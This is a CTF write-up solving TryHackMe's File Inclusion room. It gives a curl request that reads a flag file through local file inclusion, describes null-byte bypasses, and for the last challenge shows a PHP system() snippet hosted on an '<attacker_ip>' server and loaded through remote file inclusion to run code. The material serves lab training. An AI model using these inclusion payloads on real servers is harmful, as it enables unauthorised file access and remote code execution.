THM — File Inclusion WriteUp

The File Inclusion room on TryHackMe teaches you file inclusion vulnerabilities. It is part of Junior Penetration Tester path under the Introduction to Web Hacking category. This WriteUp contains solutions for the 4 challenges at the end of the room.

Challenge 1

The POST parameter “file” is vulnerable to LFI. It is possible to retrieve the flag with the following command:

curl http://10.10.179.245/challenges/chall1.php  -X POST -d "file=/etc/flag1"

Challenge 2

The THM Cookie Parameter is vulnerable to LFI. It is mandatory that the word “Admin” is inside the Cookie Parameter, but the user input gets not filtered. The string “.php” gets added to the input, hence “%00” is mandatory to include the flag:

Challenge 3

Changing the request type to POST, the file parameters gets vulnerable to LFI. It is also important to end the file parameter with null (%00). With the following request you can retrieve flag 3:

Challenge 4

The file parameter at /playground.php is vulnerable to remote file inclusion. With this vulnerability it is possible to execute arbitrary commands. A file called “cmd” with following contents have been hosted on the attacker machine:

<?PHP system("hostname"); ?>

The file could be retrieve via the following URL:

http://<attacker_ip>:4444/cmd

After calling the following URL via a GET request it was possible to run PHP code:

http://10.10.179.245/playground.php?file=http://<attacker_ip>:4444/cmd

--

--

--

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What is Identity Management? Security in the Age of Anonymity

Cyber Security 2018: How to stay secure in this digital age

{UPDATE} FootLOL - Crazy Soccer Hack Free Resources Generator

Razer mouse software bug easily grants Windows admin privileges

Razer mouse software bug easily grants Windows admin privileges

How do I protect my privacy online? — HailBytes

What is the Cybersecurity Maturity Model Certification (CMMC)?

2FA Just Got Better With HYDROGEN

Bridged Network Airdrop Event

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!

More from Medium

Throwback — Part 2 — Mail Server

picoCTF - jAuth writeup

Paper— HackTheBox Write-up

HackTheBox-Forge